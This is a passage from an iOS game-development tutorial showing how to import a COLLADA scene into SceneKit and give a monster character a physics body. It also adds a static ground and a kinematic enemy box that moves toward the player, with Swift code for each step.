and a spotlight in the scene. You can select each object and move it around using the arrow at the pivot point of the object. You can also rotate the scene to get a better view by clicking and dragging the left mouse button on the preview scene. For zooming, scroll your mouse wheel up and down. To pan, hold the Alt button on the keyboard and left-click and drag on the preview pane. One thing to note is that rotating, zooming, and panning in the preview pane won't actually move your camera. The camera is still at the same position and angle. To view from the camera, again select the Camera001 option from the drop-down list in the preview pane and the view will reset to the camera view. At the bottom of the preview window, we can either choose to see the view through the camera or spotlight, or click-and-drag to rotate the free camera. If you have more than one camera in your scene, then you will have Camera002, Camera003, and so on in the drop-down list. Below the view selection dropdown in the preview panel you also have a play button. If you click on the play button, you can look at the default animation of the monster getting played in the preview window. The preview panel is just that; it is just to aid you in having a better understanding of the objects in the scene. In no way is it a replacement for a regular 3D package such as 3DSMax, Maya, or Blender. You can create cameras, lights, and empty nodes in the scene graph, but you can't add geometry such as boxes and spheres. You can add an empty node and position it in the scene graph, and then add geometry in code and attach it to the node. Now that we have an understanding of the scene graph, let us see how we can run this scene in SceneKit. In the init function, delete the line where we initialized the scene and add the following line instead. Also delete the objects, light, and camera we added earlier. init(currentview view:SCNView){ super.init() scnView = view _size = scnView.bounds.size //retrieve the SCNView //scene = SCNScene() scene = SCNScene(named: "monsterScene.DAE") scnView.scene = scene scnView.allowsCameraControl = true scnView.showsStatistics = true scnView.backgroundColor = UIColor.yellowColor() // self.addGeometryNode() // self.addLightSourceNode() // self.addCameraNode() // self.addFloorNode() // } Build and run the game to see the following screenshot: You will see the monster running and the yellow background that we initially assigned to the scene. While exporting the scene, if you export the animations as well, once the scene loads in SceneKit the animation starts playing automatically. Also, you will notice that we have deleted the camera and light in the scene. So, how come the default camera and the light aren't loaded in the scene? What is happening here is that while I exported the file, I inserted a camera in the scene and also added a spotlight. So, when we imported the file into the scene, SceneKit automatically understood that there is a camera already present, so it will use the camera as its default camera. Similarly, a spotlight is already added in the scene, which is taken as the default light source, and lighting is calculated accordingly. Adding objects and physics to the scene Let us now see how we can access each of the objects in the scene graph and add gravity to the monster. Accessing the hero object and adding a physics body So, create a new function called addColladaObjects and call an addHero function in it. Create a global variable called heroNode of type SCNNode. We will use this node to access the hero object in the scene. In the addHero function, add the following code: init(currentview view:SCNView){ super.init() scnView = view _size = scnView.bounds.size //retrieve the SCNView //scene = SCNScene() scene = SCNScene(named: "monster.scnassets/monsterScene.DAE") scnView.scene = scene scnView.allowsCameraControl = true scnView.showsStatistics = true scnView.backgroundColor = UIColor.yellowColor() self.addColladaObjects() // self.addGeometryNode() // self.addLightSourceNode() // self.addCameraNode() // self.addFloorNode() } func addHero(){ heroNode = SCNNode() var monsterNode = scene.rootNode.childNodeWithName( "CATRigHub001", recursively: false) heroNode.addChildNode(monsterNode!) heroNode.position = SCNVector3Make(0, 0, 0) let collisionBox = SCNBox(width: 10.0, height: 10.0, length: 10.0, chamferRadius: 0) heroNode.physicsBody?.physicsShape = SCNPhysicsShape(geometry: collisionBox, options: nil) heroNode.physicsBody = SCNPhysicsBody.dynamicBody() heroNode.physicsBody?.mass = 20 heroNode.physicsBody?.angularVelocityFactor = SCNVector3Zero heroNode.name = "hero" scene.rootNode.addChildNode(heroNode) } First, we call the addColladaObjects function in the init function, as highlighted. Then we create the addHero function. In it we initiate the heroNode. Then, to actually move the monster, we need access to the CatRibHub001 node to move the monster. We gain access to it through the ChildWithName property of scene.rootNode. For each object that we wish to gain access to through code, we will have to use the ChildWithName property of the rootNode of the scene and pass in the name of the object. If recursively is set to true, to get said object, SceneKit will go through all the child nodes to get access to the specific node. Since the node that we are looking for is right on top, we said false to save processing time. We create a temporary variable called monsterNode. In the next step, we add the monsterNode variable to heroNode. We then set the position of the hero node to the origin. For heroNode to interact with other physics bodies in the scene, we have to assign a shape to the physics body of heroNode. We could use the mesh of the monster, but the shape might not be calculated properly and a box is a much simpler shape than the mesh of the monster. For creating a box collider, we create a new box geometry roughly the width, height, and depth of the monster. Then, using the physicsBody.physicsShape property of the heroNode, we assign the shape of the collisionBox we created for it. Since we want the body to be affected by gravity, we assign the physics body type to be dynamic. Later we will see other body types. Since we want the body to be highly responsive to gravity, we assign a value of 20 to the mass of the body. In the next step, we set the angularVelocityFactor to 0 in all three directions, as we want the body to move straight up and down when a vertical force is applied. If we don't do this, the body will flip-flop around. We also assign the name hero to the monster to check if the collided object is the hero or not. This will come in handy when we check for collision with other objects. Finally, we add heroNode to the scene. Add the addColladaObjects to the init function and comment or delete the self.addGeometryNode, self.addLightSourceNode, self.addCameraNode, and self.addFloorNode functions if you haven't already. Then, run the game to see the monster slowly falling through. We will create a small patch of ground right underneath the monster so that it doesn't fall down. Adding ground Create a new function called addGround and add the following: func addGround(){ let groundBox = SCNBox(width: 10, height: 2, length: 10, chamferRadius: 0) let groundNode = SCNNode(geometry: groundBox) groundNode.position = SCNVector3Make(0, -1.01, 0) groundNode.physicsBody = SCNPhysicsBody.staticBody() groundNode.physicsBody?.restitution = 0.0 scene.rootNode.addChildNode(groundNode) } We create a new constant called groundBox of type SCNBox, with a width and length of 10, and height of 2. Chamfer is the rounding of the edges of the box. Since we didn't want any rounding of the corners, it is set to 0. Next we create a SCNNode called groundNode and assign groundBox to it. We place it slightly below the origin. Since the height of the box is 2, we place it at –1.01 so that heroNode will be (0, 0, 0) when the monster rests on the ground. Next we assign the physics body of type static body. Also, since we don't want the hero to bounce off the ground when he falls on it, we set the restitution to 0. Finally, we then add the ground to the scene's rootnode. The reason we made this body static instead of dynamic is because a dynamic body gets affected by gravity and other forces but a static one doesn't. So, in this scene, even though gravity is acting downward, the hero will fall but groundBox won't as it is a static body. You will see that the physics syntax is very similar to SpriteKit with static bodies and dynamic bodies, gravity, and so on. And once again, similar to SpriteKit, the physics simulation is automatically turned on when we run the scene. Add the addGround function in the addColladaObjects functions and run the game to see the monster getting affected by gravity and stopping after coming in touch with the ground. Adding an enemy node To check collision in SceneKit, we can check for collision between the hero and the ground. But let us make it a little more interesting and also learn a new kind of body type: the kinematic body. For this, we will create a new box called enemy and make it move and collide with the hero. Create a new global SCNNode called enemyNode as follows: let scnView: SCNView! let _size:CGSize! var scene: SCNScene! var heroNode:SCNNode! var enemyNode:SCNNode! Also, create a new function called addEnemy to the class and add the following in it: func addEnemy(){ let geo = SCNBox(width: 4.0, height: 4.0, length: 4.0, chamferRadius: 0.0) geo.firstMaterial?.diffuse.contents = UIColor.yellowColor() enemyNode = SCNNode(geometry: geo) enemyNode.position = SCNVector3Make(0, 20.0 , 60.0) enemyNode.physicsBody = SCNPhysicsBody.kinematicBody() scene.rootNode.addChildNode(enemyNode) enemyNode.name = "enemy" } Nothing too fancy here! Just as when adding the groundNode, we have created a cube with all its sides four units long. We have also added a yellow color to its material. We then initialize enemyNode in the function. We position the node along the x, y, and z axes. Assign the body type as kinematic instead of static or dynamic. Then we add the body to the scene and finally name the enemyNode as enemy, which we will be needing while checking for collision. Before we forget, call the addEnemy function in the addColladaObjects function after where we called the addHero function. The difference between the kinematic body and other body types is that, like static, external forces cannot act on the body, but we can apply a force to a kinematic body to move it. In the case of a static body, we saw that it is not affected by gravity and even if we apply a force to it, the body just won't move. Here we won't be applying any force to move the enemy block but will simply move the object like we moved the enemy in the SpriteKit game. So, it is like making the same game, but in 3D instead of 2D, so that you can see that although we have a third dimension, the same principles of game development can be applied to both. For moving the enemy, we need an update function for the enemy. So, let us add it to the scene by creating an updateEnemy function and adding the following to it: func updateEnemy(){ enemyNode.position.z += -0.9 if((enemyNode.position.z - 5.0) < -40){ var factor = arc4random_uniform(2) + 1 if( factor == 1 ){ enemyNode.position = SCNVector3Make(0, 2.0 , 60.0) }else{ enemyNode.position = SCNVector3Make(0, 15.0 , 60.0) } } } In the update function, similar to how we moved the enemy in the SpriteKit game, we increment the Z position of the enemy node by 0.9. The difference being that we are moving the z direction. Once the enemy has gone beyond –40 in the z direction, we reset the position of the enemy. To create an additional challenge to the player, when the enemy resets, a random number is chosen between 1 and 2. If it is 1, then the enemy is placed closer to the ground, otherwise it is placed at 15 units from the ground. Later, we will add a jump mechanic to the hero. So, when the enemy is closer to the ground, the hero has to jump over the enemy box, but when the enemy is spawned at a height, the hero shouldn't jump. If he jumps and hits the enemy box, then it is game over. Later we will also add a scoring mechanism to keep score. For updating the enemy, we actually need an update function to add the enemyUpdate function to so that the enemy moves and his position resets. So, create a function called update in the class and call the updateEnemy function in it as follows: func update(){ updateEnemy() } Summary This article has given insight on how to create a scene with SCNScene, how to add objects to a scene, how to import scenes from external 3D applications, how to adding physics to the scene, and how to add an enemy. Resources for Article: Further resources on this subject: - Creating a Brick Breaking Game [article] - iOS Security Overview [article] - Code Sharing Between iOS and Android [article]
https://www.packtpub.com/books/content/scenekit
CC-MAIN-2017-22
refinedweb
4,516
64.81
Hi Diego, On Sat, 2007-01-06 at 16:01 +0100, Diego Biurrun wrote: [...] > > --- tests/Makefile (revision 7406) > > +++ tests/Makefile (working copy) > > @@ -16,7 +16,14 @@ > > > > +ifeq ($(CONFIG_SWSCALER),yes) > > +all fulltest test: > > + @echo > > + @echo "Cannot perform tests if libswscaler is enabled" > > Nit: Missing period at the end. > > Also, there is no such thing as libswscaleR. The directory is called > libswscale, the program software scaler, the configure option swscaler. > We should settle on a name someday. Ok; maybe the right thing to write here should be "... if the software scaler is enabled", since "libswscale is enabled" does not make too much sense :). > > + @echo > > +else > > all fulltest test: codectest libavtest test-server > > +endif > > Do both codectest and libavtest fail? Yes, they both fail. > What if I call codectest or libavtest directly? > I think your patch will not help then... You are right; I tried to make the patch as simple as possible by only considering the most common case (make test). I'll rewrite the patch protecting all the "codectest", "libavtest", and "test-server" targets with "ifeq ($(CONFIG_SWSCALER),yes)". Thanks, Luca
http://ffmpeg.org/pipermail/ffmpeg-devel/2007-January/027122.html
CC-MAIN-2013-48
refinedweb
179
75.4
Haskell/Lists III Folds[edit] Like map, a fold is a higher order function that takes a function and a list. However, instead of applying the function element by element, the fold uses it to combine the list elements into a result value. Let's look at a few concrete examples. sum could be implemented as: Example: sum sum :: [Integer] -> Integer sum [] = 0 sum (x:xs) = x + sum xs and product as: Example: product product :: [Integer] -> Integer product [] = 1 product (x:xs) = x * product xs concat, which takes a list of lists and joins (concatenates) them into one: Example: concat concat :: [[a]] -> [a] concat [] = [] concat (x:xs) = x ++ concat xs All these examples show a pattern of recursion known as a fold. Think of the name referring to a list getting "folded up" into a single value or to a function being "folded between" the elements of the list. Prelude defines four fold functions: foldr, foldl, foldr1 and foldl1. foldr[edit] The right-associative foldr folds up a list from the right to left. As it proceeds, foldr uses the given function to combine each of the elements with the running value called the accumulator. When calling foldr, the initial value of the accumulator is set as an argument. foldr :: (a -> b -> b) -> b -> [a] -> b foldr f acc [] = acc foldr f acc (x:xs) = f x (foldr f acc xs) The first argument to foldr is a function with two arguments. The second argument is value for the accumulator (which often starts at a neutral "zero" value). The third argument is the list to be folded. In sum, f is (+), and acc is 0. In concat, f is (++) and acc is []. In many cases (like all of our examples so far), the function passed to a fold will be one that takes two arguments of the same type, but this is not necessarily the case (as we can see from the (a -> b -> b) part of the type signature — if the types had to be the same, the first two letters in the type signature would have matched). Remember, a list in Haskell written as [a, b, c] is an alternative (syntactic sugar) style for a : b : c : []. Now, foldr f acc xs in the foldr definition simply replaces each cons (:) in the xs list with the function f while replacing the empty list at the end with acc: foldr f acc (a:b:c:[]) = f a (f b (f c acc)) Note how the parentheses nest around the right end of the list. An elegant visualisation is given by picturing the list data structure as a tree: : f / \ / \ a : foldr f acc a f / \ -------------> / \ b : b f / \ / \ c [] c acc We can see here that foldr (:) [] will return the list completely unchanged. That sort of function that has no effect is called an identity function. You should start building a habit of looking for identity functions in different cases, and we'll discuss them more later when we learn about monoids. foldl[edit] The left-associative foldl processes the list in the opposite direction, starting at the left side with the first element. foldl :: (a -> b -> a) -> a -> [b] -> a foldl f acc [] = acc foldl f acc (x:xs) = foldl f (f acc x) xs So, brackets in the resulting expression accumulate around the left end of the list: foldl f acc (a:b:c:[]) = f (f (f acc a) b) c The corresponding trees look like: : f / \ / \ a : foldl f acc f c / \ -------------> / \ b : f b / \ / \ c [] acc a Because all folds include both left and right elements, beginners can get confused by the names. You could think of foldr as short for fold-right-to-left and foldl as fold-left-to-right. The names refer to where the fold starts. Note Technical Note: foldl is tail-recursive, that is, it recurses immediately, calling itself. For this reason the compiler will optimise it to a simple loop for efficiency. However, Haskell is a lazy language, so the calls to f will be left unevaluated by default, thus building up an unevaluated expression in memory that includes the entire length of the list. To avoid running out of memory, we have a version of foldl called foldl' that is strict — it forces the evaluation of f immediately at each step. An apostrophe at the end of a function name is pronounced "tick" as in "fold-L-tick". A tick is a valid character in Haskell identifiers. foldl' can be found in the Data.List library module (imported by adding import Data.List to the beginning of a source file). As a rule of thumb, you should use foldr on lists that might be infinite or where the fold is building up a data structure and use foldl' if the list is known to be finite and comes down to a single value. There is almost never a good reason to use foldl (without the tick), though it might just work if the lists fed to it are not too long. Are foldl and foldr opposites?[edit][edit] As previously noted, the type declaration for foldr makes it quite possible for the list elements and result to be of different types. For example, "read" is a function that takes a string and converts it into some type (the type system is smart enough to figure out which one). In this case we convert it into a float. Example: The list elements and results can have different types addStr :: String -> Float -> Float addStr str x = read str + x sumStr :: [String] -> Float sumStr = foldr addStr 0.0 There is also a variant called foldr1 ("fold - R - one") which dispenses with an explicit "zero" for an accumulator by taking the last element of the list instead: foldr1 :: (a -> a -> a) -> [a] -> a foldr1 f [x] = x foldr1 f (x:xs) = f x (foldr1 f xs) foldr1 _ [] = error "Prelude.foldr1: empty list" And foldl1 as well: foldl1 :: (a -> a -> a) -> [a] -> a foldl1 f (x:xs) = foldl f x xs foldl1 _ [] = error "Prelude.foldl1: empty list" Note: Just like for foldl, the Data.List library includes foldl1' as a strict version of foldl1. With foldl1 and foldr1, all the types have to be the same, and an empty list is an error. These variants are useful when there is no obvious candidate for the initial accumulator value and we are sure that the list is not going to be empty. When in doubt, stick with foldr or foldl'. folds and laziness[edit] One reason that right-associative folds are more natural in Haskell than left-associative ones is that right folds can operate on infinite lists. A fold that returns an infinite list is perfectly usable in a larger context that doesn't need to access the entire infinite result. In that case, foldr can move along as much as needed and the compiler will know when to stop. However, a left fold necessarily calls itself recursively until it reaches the end of the input list (because the recursive call is not made in an argument to f). Needless to say, no end will be reached if an input list to foldl is infinite. As a toy example, consider a function echoes that takes a list of integers and produces a list such that wherever the number n occurs in the input list, it is replicated n times in the output list. To create our echoes function, we will use the prelude function replicate in which replicate n x is a list of length n with x the value of every element. We can write echoes as a foldr quite handily: echoes = foldr (\ x xs -> (replicate x x) ++ xs) [] take 10 (echoes [1..]) -- [1,2,2,3,3,3,4,4,4,4] (Note: This definition is compact thanks to the \ x xs -> syntax. The \, meant to look like a lambda (λ), works as an unnamed function for cases where we won't use the function again anywhere else. Thus, we provide the definition of our one-time function in situ. In this case, x and xs are the arguments, and the right-hand side of the definition is what comes after the ->.) We could have instead used a foldl: echoes = foldl (\ xs x -> xs ++ (replicate x x)) [] take 10 (echoes [1..]) -- not terminating but only the foldr version works on an infinite lists. What would happen if you just evaluate echoes [1..]? Try it! (If you try this in GHCi or a terminal, remember you can stop an evaluation with Ctrl-c, but you have to be quick and keep an eye on the system monitor or your memory will be consumed in no time and your system will hang.) As a final example, map itself can be implemented as a fold: map f = foldr (\ x xs -> f x : xs) [] Folding takes some time to get used to, but it is a fundamental pattern in functional programming and eventually becomes very natural. Any time you want to traverse a list and build up a result from its members, you likely want a fold. Scans[edit] A "scan" is like a cross between a map and a fold. Folding a list accumulates a single return value, whereas mapping puts each item through a function returning a separate result for each item. A scan does both: it accumulates a value like a fold, but instead of returning only a final value it returns a list of all the intermediate values. Prelude contains four scan functions: scanl :: (a -> b -> a) -> a -> [b] -> [a] scanl accumulates the list from the left, and the second argument becomes the first item in the resulting list. So, scanl (+) 0 [1,2,3] = [0,1,3,6]. scanl1 :: (a -> a -> a) -> [a] -> [a] scanl1 uses the first item of the list as a zero parameter. It is what you would typically use if the input and output items are the same type. Notice the difference in the type signatures between scanl and scanl1. scanl1 (+) [1,2,3] = [1,3,6]. scanr :: (a -> b -> b) -> b -> [a] -> [b] scanr (+) 0 [1,2,3] = [6,5,3,0] scanr1 :: (a -> a -> a) -> [a] -> [a] scanr1 (+) [1,2,3] = [6,5,3] These two functions are the counterparts of scanl and scanl1 that accumulate the totals from the right. filter[edit] A common operation performed on lists is filtering — generating a new list composed only of elements of the first list that meet a certain condition. A simple example: making a list of only even numbers from a list of integers. retainEven :: [Int] -> [Int] retainEven [] = [] retainEven (n:ns) = -- mod n 2 computes the remainder for the integer division of n by 2. if (mod n 2) == 0 then n : (retainEven ns) else retainEven ns This definition is somewhat verbose and specific. Prelude provides a concise and general filter function with type signature: filter :: (a -> Bool) -> [a] -> [a] So, a (a -> Bool) function tests an elements for some condition, we then feed in a list to be filtered, and we get back the filtered list. To write retainEven using filter, we need to state the condition as an auxiliary (a -> Bool) function, like this one: isEven :: Int -> Bool isEven n = (mod n 2) == 0 And then retainEven becomes simply: retainEven ns = filter isEven ns We used ns instead of xs to indicate that we know these are numbers and not just anything, but we can ignore that and use a more terse point-free definition: retainEven = filter isEven This is like what we demonstrated before for map and the folds. Like filter, those take another function as argument; and using them point-free emphasizes this "functions-of-functions" aspect. List comprehensions[edit] List comprehensions are syntactic sugar for some common list operations, such as filtering. For instance, instead of using the Prelude filter, we could write retainEven like this: retainEven es = [n | n <- es, isEven n] This compact syntax may look intimidating, but it is simple to break down. One interpretation is: - (Starting from the middle) Take the list es and draw (the "<-") each of its elements as a value n. - (After the comma) For each drawn n test the boolean condition isEven n. - (Before the vertical bar) If (and only if) the boolean condition is satisfied, append n to the new list being created (note the square brackets around the whole expression). Thus, if es is [1,2,3,4], then we would get back the list [2,4]. 1 and 3 were not drawn because (isEven n) == False . The power of list comprehensions comes from being easily extensible. Firstly, we can use as many tests as we wish (even zero!). Multiple conditions are written as a comma-separated list of expressions (which should evaluate to a Boolean, of course). For a simple example, suppose we want to modify retainEven so that only numbers larger than 100 are retained: retainLargeEvens :: [Int] -> [Int] retainLargeEvens es = [n | n <- es, isEven n, n > 100] Furthermore, we are not limited to using n as the element to be appended when generating a new list. Instead, we could place any expression before the vertical bar (if it is compatible with the type of the list, of course). For instance, if we wanted to subtract one from every even number, all it would take is: evensMinusOne es = [n - 1 | n <- es, isEven n] In effect, that means the list comprehension syntax incorporates the functionalities of map and filter. To further sweeten things, the left arrow notation in list comprehensions can be combined with pattern matching. For example, suppose we had a list of (Int, Int) tuples, and we would like to construct a list with the first element of every tuple whose second element is even. Using list comprehensions, we might write it as follows: firstForEvenSeconds :: [(Int, Int)] -> [Int] firstForEvenSeconds ps = [fst p | p <- ps, isEven (snd p)] -- here, p is for pairs. Patterns can make it much more readable: firstForEvenSeconds ps = [x | (x, y) <- ps, isEven y] As in other cases, arbitrary expressions may be used before the |. If we wanted a list with the double of those first elements: doubleOfFirstForEvenSeconds :: [(Int, Int)] -> [Int] doubleOfFirstForEvenSeconds ps = [2 * x | (x, y) <- ps, isEven y] Not counting spaces, that function code is shorter than its descriptive name! There are even more possible tricks: allPairs :: [(Int, Int)] allPairs = [(x, y) | x <- [1..4], y <- [5..8]] This comprehension draws from two lists, and generates all possible (x, y) pairs with the first element drawn from [1..4] and the second from [5..8]. In the final list of pairs, the first elements will be those generated with the first element of the first list (here, 1), then those with the second element of the first list, and so on. In this example, the full list is (linebreaks added for clarity): Prelude> [(x, y) | x <- [1..4], y <- [5..8]] [(1,5),(1,6),(1,7),(1,8), (2,5),(2,6),(2,7),(2,8), (3,5),(3,6),(3,7),(3,8), (4,5),(4,6),(4,7),(4,8)] We could easily add a condition to restrict the combinations that go into the final list: somePairs = [(x, y) | x <- [1..4], y <- [5..8], x + y > 8] This list only has the pairs with the sum of elements larger than 8; starting with (1,8), then (2,7) and so forth.
https://en.wikibooks.org/wiki/Haskell/Lists_III
CC-MAIN-2018-05
refinedweb
2,575
65.76
ASP.net MVC regular expression in view model for filename validation I've read a few questions that answer this, and I understand the regular expression I'm required to use, however actually applying it in MVC is where I stumble. I will also preface by saying I am terrible at regular expressions so far. I'm writing a file upload application in MVC and I want to apply standard windows filename validation. \/:*?"<>| are invalid characters anywhere in the name. My View Model for this is setup like so, using a different regex I found: public class FileRenameModel { [RegularExpression(@"^[\w\-. ]+$", ErrorMessage="A filename cannot contain \\ / : * ? \" < > |")] [Required] public string Filename { get; set; } [Required] public int FileID { get; set; } } Whenever I try to change the regex to @"^[\\/:?"<>|]+$ the " in the middle kills it and throws an error. I haven't figured out how to properly escape it so that I can include it in the string. When I use the regex without the " it tells me any string I put into the textbox fails. Am I using the ^ incorrectly? Answers Use double "" to escape quotes after starting a string with @. To search for anything except you'd want to insert an additional ^ inside the brackets to create an except for match: @"^[^\\/:?""<>|]+$" Keep the ^ at the beginning as well to match the start of line. Having said that, keep in mind for validation that browsers handle file names differently. Some older browsers sent a path along with the filename, that might break your validation for a legitimate file. Need Your Help No resource found that matches the given name: attr 'android:windowTranslucentNavigation' android android-4.4-kitkat navigationbarI'm trying to make the Navigation Bar transparent on devices with 4.4. However, the SDK does not find the resource.
http://unixresources.net/faq/16344492.shtml
CC-MAIN-2019-13
refinedweb
296
56.45
Type: Posts; User: flex567 solved that problem with '\\' for (int i = 0; i <= c_path_name.length-1; i++) { if(c_path_name[i] == '\') { c_path_name[i] = '/'; } } Can someone explain to me why this won't compile?... 3077330775 I get this 2 warnings when i run Eclipse. Why are they popping up and what can i do to fix it? aha, now it works. Thanx. Hi, Can anyone explain why is this error? hm, i guess it is better that i remove double quotes in mysql database. hi, I created a function that returns an id field and proverb field in mysql. Right now my function returns this row: 1"The die is cast" In xml format this would probably look like this ... Hi, anybody knows what is the problem here? Actually now it works. I dont really know why is there a setSSLOnConnect function instead setSSL on their webpage. I added classes that was needed but it still won't work. The problem is that function SetSSLOnConnect is undefined The proposed solution is add cast to Email but even after casting it wont work. ... after some tweaking i fixed some errors hi, Can somebody explain to me why this code wont compile, I would like to send an email with this program. I got the program from here: ... i just found an error Where should i put it? here are some options pic pic Anybody knows why this code won't compile? package com.leebrainlow.tween; import android.app.Activity; import android.os.Bundle; import android.view.View; import... yesterday won't compile but today i compiled it and run it with no problem.(but i didn't changed one thing) ? Hi, Can you tell me why this program wont compile? The problem is "id"(red underline). I can provide some additional... so actually the JVM calls these functions? How is it possible that we never call actionPerformed and Run functions? We just declare them. oh, i understand. I created 2 variables with the same name(JButton gmPlus) - inside the function and ... Can you explain this a little bit more. What should i fix in this code in order for this program to work? I dont know why are all conditions in all IF statesmant always negative(false)? This is a calculator, I didnt make any notes becase i thought it is an easy program. import javax.swing.*; import java.awt.*; import java.awt.Event.*; import java.awt.event.ActionEvent;...
http://forums.codeguru.com/search.php?s=54f8cf62a47e60d50e32afdcb5cb03b1&searchid=5096403
CC-MAIN-2014-41
refinedweb
406
77.53
Important: Please read the Qt Code of Conduct - Adding QTforms to existing project Hello all, im new to Qt and have to say that i am more than impressed. Easy to install and works out of the box. Lots of examples to get instant hands on experience and what seems to be a thriving community. As a noob i am starting out by using the addressbook tutorial to look at the files and the logic behind CPP programming. Within the tutorial it doesn't seem to use a form to build the gui and personally i would like to add one so i can see whats going on. If anyone has already done this tutorial or can explain how i can add a form to intergrate and display the existing info and buttons etc, it would be a great help in getting me started. Thanks in advance Quick walk-through: Create a .ui file Add the .ui file to your project In your class definition add: @namespace Ui { class MyClass; } class MyClass : public QWidget { ... private: Ui::MyClass *ui; };@ In your implementation: @ #include "ui_myclass.h" MyClass::MyClass(QWidget *parent) : QWidget(parent), ui(new Ui::MyClass) { ui->setupUi(); } MyClass::~MyClass() { delete ui; }@ Hi Franzk This is what i have done: Right click on the Addressbook.pro folder > Add New > QT > but from there i have 4 choices - Qt Designer Form Class - Qt Designer Form - Qt Resource file - Qt QML File I have tried with both form and form class and i'm not sure which i need. Either way i click next and have the new options dialog which displays with more choices. I am hesitating between a main window and a widget. I believe widget is the way to go. As i am sure you already know Form class will create a .h And a .cpp file alongside the ui file, this already contains the info you mentioned above. So i am guessing i need to use a form without class and add the info you provided to the existing .h and .cpp files. Am i along the right lines or am i barking up the wrong tree? If i do need a form without class, do i go main window or widget and finaly and probably the most important: Could you please explain what and where is the class definition that i need to add the above info to and when you say implementation, which file is that ( i thought it to be main.cpp) Thanks again I was under the impression that you wanted to add a ui to an already existing class. If that's not the case, your approach is the proper one. If you create a new form & class using Qt Creator, a .ui, .h and .cpp will be created (say myclass.ui, myclass.h and myclass.cpp). The classes involved are then MyClass, which is a QWidget derived class, MyClass_Ui which is a helper class that doesn't do much except setting up the UI, and Ui::MyClass, which is the same thing as MyClass_Ui, only in a namespace possibly to avoid ugly naming or so. To use your new widget, your application should then instantiate a MyClass. The Ui::MyClass class is of no use to anything other than MyClass itself. Thanks for your replies Franzk, but i have tried and tried since your last post, and no matter what i do i can't get the info to display on the form. I have tried everyway i can possibly think off and its just not happening. yes i know i'm a noob and that Cpp is probably the hardest programming language for a noob to start with, and that i have a whole load of learning and reading (which i am doing) to do, but a little extra help from yourself or anyone else would be greatly appreciated. Maybe a do this and then do that approach would help a lot. I just want to get the existing addressbook tutorial to display on a form. Please anyone, Help me, its so frustrating when your at the bottom of the ladder. So you're starting from the Addressbook example. Could you try to describe exactly what you want to add to it? And probably also what you already have done that worked out (in some way or another) for you? That will make it slightly easier for us to give you a recipe. Basicly i am following the tutorial (not the demo) and its all going as planned, except that something in the tutorial doesn't give the same result as the files included. Maybe i did something wrong, but i distinctly feel that the result and the tutorial examples are not the same. From there going directly to part 7 i see the whole example is there and already working (easier to learn with a full example). With all the files from part 7 open and browsing around i see there is no form for this working example. I basicly want to add a form and transfer the existing info, labels, buttons etc etc so they display within that new form. Maybe i have missed something or haven't made myself clear with my explanations. Thanks again, i understand it must be frustrating for hardened programmers such as yourself, when someone like myself has no idea where to start. But believe me i want to learn! [quote author="Atom Byte" date="1298729745"]Thanks again, i understand it must be frustrating for hardened programmers such as yourself, when someone like myself has no idea where to start. But believe me i want to learn![/quote]Don't worry about that. Everyone was a beginner once :P. I'll see if I can get to it somewhere this weekend. Else I hope someone else picks up from here. Don't go out of your way man, weekends are precious. Just a little guidence would more than appreciated. I didn't get to doing anything related to this. You got any progress? For the moment no i haven't, its so frustrating. Then i had my machine go crazy, so i have formatted and am in the process of re-installing everything. I think its down to installing wx widgets, dev c++, and a multitude of other programming tools to see what would be the easiest to learn with, but causing an eventual conflict somewhere. I am at the point where i am about to re-install QT and nothing else (programming).
https://forum.qt.io/topic/3925/adding-qtforms-to-existing-project/?
CC-MAIN-2021-17
refinedweb
1,087
70.94
EMMA has two SDK for Xamarin, one for Android and one for iOS. Both are "bindings" of the respective native libraries, therefore methods share name and how to integrate it is very similar to the native. 1. Download the SDK - iOS binding 4.5.2 of native SDK. - Android 4.5.3 of native SDK. 2. Add the .dll to the project First, you have to import the EMMA SDK our Xamarin project. You have to add in the References folder, in this folder system libraries or third-party libraries are housed. To add the SDK as a reference, copy the .dll file to the root folder of the project, then add the reference, giving right-click on the folder. Once open the Edit Reference screen, access to the .Net Assembly tab and choose the .dll file. Click OK and you have the SDK integrated into the project. The Android procedure is the same, it will only be necessary to add a reference to the project next to the EMMA SDK binding, InstallReferrer.dll, this reference can be found with SDK dll in Github repository. 3. Start session In both OS to start session, you must specify the use of the library in the code: using EMMASDK; In Android add it to Application extension: EMMA.Instance.StartSession(this); You have to add the following code in AndroidManfiest.xml: <meta-data android: in iOS in AppDelegate.cs: EMMA.StartSession("<EMMA Session Key>"); NOTE: If you are using iOS XamarinForms, add the following attribute in the AppDelegate.cs: public override UIWindow Window { get; set; } 4. Dependencies (Android only) To integrate the SDK in Android, add the following packages in order: - Kwon.Squareup.OkHttp3.Logging-interceptor (3.9.1.1) - Kwon.Squareup.Retrofit2.Retrofit-converter (2.3.0.1) - Karamunting.Xamarin.BumpTech.Glide (v4.8.0) - Xamarin.Firebase.Messaging (71.1733.0) Optional, only for push. You have check the box "Show pre-release" to activate it. Remember add the reference InstallReferrer.dll cited above. 5. Continue with integration Once the above points, and you can use all the options offered by the SDK EMMA, you must consult the documentation of native libraries. The method names are identical, only changes the manner of invocation with C#. Important If you use push notifications, it is important to keep in mind that every time a Rebuild is made and a subsequent installation in Visual Studio, when the app is installed, the push token is invalidated because FCM detects that the app has been uninstalled. If this happens, uninstall the app manually and reinstall it, this will generate a new token. Before sending a test push from the EMMA platform, you can try the following Curl method to know if the token is valid. If "Not Registered" appears, the token has been invalidated. integration documentation 6. Sample App For viewing the sample app go to this GitHub repository:
https://support.emma.io/hc/en-us/articles/208011149-Android-and-iOS-integration
CC-MAIN-2019-51
refinedweb
482
57.47
Should App Developers Go for Xamarin? Building a cross platform mobile app remains challenging because programming language, event model, UI model, and resource model all differ from one platform to other. Xamarin can help with this. Join the DZone community and get the full member experience.Join For Free Be it a company or an entrepreneur, if an app needs to be developed for them, it cannot be just on one platform. The current mobile ecosystem works basically on 3 main platforms – Android, iOS, and Windows. For every new client the apps based on these 3 platforms need to be in stores, ready for downloads, as soon as possible. This is a big ask for app developers. The trouble with developing native apps is that you invest a lot of resources into projects, manage multiple development teams for each platform, spend time developing different code base, and end up reaching markets much later. Earlier app developers adopted one of the two ways to develop cross-platform apps. You could either develop the apps in silos where you needed Xcode, Eclipse, and Visual Studio (and Objective C, Java, and C#) to develop apps for iOS, Android, and Windows platforms respectively. It was a stressful way as anytime a new UI needed to be implemented all three teams on different platforms needed to work hand-in-hand to maintain uniformity. Or, you had platforms like Appcelator, Sencha, and PhoneGap which enabled the developer to code in one language (HTML for Appcelator, Javascript for Sencha, and CSS for PhoneGap) with one build targeting all platforms. In these cases the source code is interpreted at the run time. User experience and performance suffers. Building a cross platform mobile app remains challenging because 